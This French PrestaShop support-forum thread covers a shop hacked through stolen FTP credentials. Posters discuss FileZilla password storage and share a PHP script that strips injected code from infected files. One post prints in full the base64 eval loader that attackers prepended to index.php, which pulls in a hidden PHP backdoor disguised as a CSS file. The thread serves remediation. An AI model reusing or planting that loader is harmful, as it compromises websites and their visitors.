Jump to content

"resolu" Qui pourrai verifier les failles de mon site? suite piratage et repiratage


luggy
 Share

Recommended Posts

Bonjour,
aujourd'hui je me suis fait pirater, plus de site.
Tout les fichiers et bdd etait toujours la mais modifié.
Alors j'aimerai bien savoir si il est possible de verifier mon site.(j'ai tout remis en place et changé les mdp).
avec un logiciel ou quelq'un as t il la possibilité de le faire rapidement?
ai-je loupé une etape(droit de fichiers par exemple) ou y'a-t-il une faille evidente sur prestashop?

J'ai aussi sauvegarder tout le site hacké avec la bdd (j'ai pas eu le temp de verifier si elle a été modifié).
le index.php commence par : <?php eval(base64_decode('aWYo.....)

Merci d'avance.

Share this post


Link to post
Share on other sites

Bonsoir Luggy,

C'est un hack classique qui tourne beaucoup en ce moment sur le net.

Dans la plupart des cas, ton PC en lui même est infecté, et le robot est allé voir ton fichier de mots de passe FTP.
Je présume que tu utilises Filezilla par exemple, les accès sont stockés en clair.

Après il se connecte et scanne l'ensemble des fichiers, cherche tout ce qui est index.php et ajoute la ligne mentionnée en début de fichier.

Urgent : modifier tes accès FTP et installer un antivirus sur ta machine

Plus d'info sur ce type de hack ici :
http://www.google.fr/#hl=fr&source=hp&q=hack+deface+base64_decode&btnG=Recherche+Google&meta;=&aq=f&oq=hack+deface+base64_decode&fp=ac6a7a6977528674

Cordialement,

Share this post


Link to post
Share on other sites

bonjour
merci de la reponse rapide,
j'ai un antivirus sur mon pc, rien...
apres c'est vrai que j'utilise ce client ftp.
je vais essayé de renforcer tout ca ......
merci

ps je pense que le post de cuisinedu13 est similaire.

Share this post


Link to post
Share on other sites

oui mais la je suis obliger de tout reinstaler car le pc est naze
je suis dans la phase sauvegarde. mais merci.
La je galere bien et je vais pas beaucoup dormir.

Par contre je tiens a SIGNALER que j'avais plusieur site sous mon filezila contenant des index.php aussi
mais seul le site avec prestashop a été piraté et ce a 2 reprises aujourd'hui
Ce matin en partant j'avais le pc eteint
le 1er hack c'est fait cet apres midi le second ce soir pendant ce post. Alors ce n'est pas que je ne crois pas Bruno.
Mais cela a L'air relativement etrange.
pour le bug du pc avec wind aube c'est pas la 1ere fois que windows plante.
Je pense réellement qu'il faut surveiller ce probleme si je ne suis pas le seul.(pour l'instant on est au moins 2)
La derniere chose que j'ai fait (sans accusation) il y a dans un post du forum une personne qui propose de s'inscrire pour son futur annuaire de ecommerce et ce gratuitement. j'ai tenté on verra bien.

si le probleme venait vraiment d'un cheval de troie ba j'ai vraiment pas de bol(mais j'ai tout sauvegarder je verrai bien)

Share this post


Link to post
Share on other sites

Re,

Le hack n'a rien à voir avec le fait que le PC soit allumé ou non.

Dès lors que l'attaquant a récupéré l'accès FTP, il lance l'attaque depuis un serveur passerelle.

Pour cela, il suffit de demander à ton hébergeur de regarder dans les logs FTP quelle est l'adresse IP qui a modifié le fichier index.php.

Cordialement,

Share this post


Link to post
Share on other sites

Merci :)
Pour le mac, perso, je dois rester sur PC pas le choix.
Il faut donc un bon client FTP sur PC si fliezilla est trop dangereux.

Ce qui m'épate, c'est que les anciennes versions de filezilla permettaient de ne pas stocker le mot de passe. Désormais, ça n'est plus possible. Pour ma part, je le supprime donc de mon assistant de connexion après chaque connexion. Mais c'est pas bien pratique...

Share this post


Link to post
Share on other sites

Merci a vous,
bon manifestement je me suis fais prendre sur mon pc,
je pense avoir eu un peu de chance du fait qu'il s'en soit pris qu'a un seul site.
Mais moins pour le pc.
j'ai tenter un nouveau client ftp (core ftp) je le deconseille : une bonne partie de la nuit et de la journée pour transeferer le img/p.
(Pour le pc allumé c'etait par rapport a la recuperation des mots de passe ca a du se faire quelques jours avant )

Share this post


Link to post
Share on other sites

HA j'oubliais pendant que j'y suis google est passé sur mon site a ce moment la (ainsi que 2autres moteurs)
du coup j'ai demandé une verification mais j'ai perdu en position sur certaine recherche.
Vous pensez que cela va redevenir comme avant?

Share this post


Link to post
Share on other sites

Sous Windows XP, il suffit de crypter le dossier C:\Documents and Settings\VotreUser\Application Data\FileZilla (ou équivalent).
Pour crypter, clic-droit sur le dossier, propriétés, avancé, crypter.


A priori ça ne servirait pas à grand chose car cela crypte pour éviter aux autres utilisateurs de la même machine de lire les données et pas à un logiciel lancé dans la session courante :

http://support.microsoft.com/kb/307877/fr

Share this post


Link to post
Share on other sites

Pour le moment, la solution que j'utilise est de ne pas stocker mon MDP dans filezilla.
Cela m'oblige à ouvrir mon gestionnaire de connexion, entrer le mdp puis me connecter.
Puis une fois connecté, ouvrir à nouveau le gestionnaire de connexion pour effacer le mdp.

Alors qu'il suffirait que filezilla remette sa case à cocher pour choisir de sauvegarder ou non le mdp, comme c'était le cas dans les anciennes versions !

Share this post


Link to post
Share on other sites

Pouvoir sauvegarder les listes de serveurs pour le multi-upload car actuellement c'est enregistré automatiquement mais on ne peut pas créer plusieurs listes. A noter un bug sur l'import FileZilla 3 et les paths de serveurs qui sera corrigé dans la prochaine build.

Share this post


Link to post
Share on other sites

  • 3 months later...

Si ça peut aider quelqu'un, j'ai trouvé un petit bout de code (à mettre dans un fichier php à la racine du site) qui nettoie tous les fichiers php infectés en remplacant
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzE2L2QxODkzNjc2MjIvaHRkb2NzL3Nob3AvanMvdGlueW1jZS9qc2NyaXB0cy90aW55X21jZS90aGVtZXMvYWR2YW5jZWQvc2tpbnMvZGVmYXVsdC9pbWcvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

par <?php /**/ ?>

Il suffit de mettre la chaine de caractères qui vous concerne dans le code ci-dessous:

<?php
/**
* Nettoire les fichiers
*
* @param string $name
*/
function nettoieFichier($name){
   //ouvre le fichier
   $data = file_get_contents($name);
   $count = 0;
   $data = str_replace('eval(base64_decode(\'<------EDIT------>\'));','',$data,$count);

   if($count!=0){
       echo ' Patched ';
       file_put_contents($name,$data);//ecrit le fichier
   }
}

/**
* Parcours un repertoire
*
* @param string $repname
*/
function parcoursRep($repname){
   $dir = opendir($repname);

   //lit le repertoire
   while (($file = readdir($dir)) !== false) {
       //Si c'est unfichier
       if(!is_dir($repname .'/'. $file)){
           $extension1 = substr($file, -3, 3);
           $extension2 = substr(strrchr($file,'.'),1);
           //verifien si c'est une extension php
           if($extension1==$extension2){
               if($extension1=='php'){
                   echo "Traitement du fichier : $repname/$file";
                   nettoieFichier($repname.'/'.$file);
                   echo "\n
";
               }
           }
       }else{//Si c'est un dossier
           if($file!=".." && $file!='.'){
               echo "Dir : $repname/$file \n
";
               parcoursRep($repname .'/'. $file);
           }
       }
   }
}

$dir = '.';//répertoire courant
parcoursRep($dir);
?>




PS: Merci à zzorbi du forum oscommerce
Le lien du post ici : http://www.oscommerce-fr.info/forum/index.php?showtopic=64834

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More